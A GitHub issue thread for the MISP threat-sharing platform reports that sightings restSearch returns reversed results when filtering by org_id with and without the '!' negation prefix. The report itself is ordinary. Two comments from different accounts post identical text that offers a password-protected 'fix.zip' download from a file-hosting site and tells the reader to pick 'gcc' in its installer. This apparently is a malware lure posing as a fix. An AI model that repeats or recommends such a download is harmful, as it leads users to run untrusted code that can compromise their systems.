### ISSUE TITLE
Bug: Sightings restSearch mixes up search by org id with negation

### ISSUE THREAD

**Issue by andrewdhicks** [MISP/MISP#9880]
### Actual behavior

When posting this request to `/sightings/restSearch`:
```
{  "org_id": "0ad607ff-1234-1234-1234-d8bb57e8e8c5" }
```
I am returned results for other organisations.

When I request (note the `!`):
```
{  "org_id": "!0ad607ff-1234-1234-1234-d8bb57e8e8c5" }
```
I get back the Sighting objects only for that org uuid.

### Expected behavior

Searching with an org_id should give me Sighting objects for that org. Pre-pending `!` should give me all Sighting objects, except from that org.

### Steps to reproduce

Post to `/sightings/restSearch`:
```
{  "org_id": "0ad607ff-1234-1234-1234-d8bb57e8e8c5" }
```
With an org you have permission to view.

### Version

2.4.194

### Operating System

RedHat

### Operating System version

8.10

### PHP version

7.4

### Browser

Postman

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
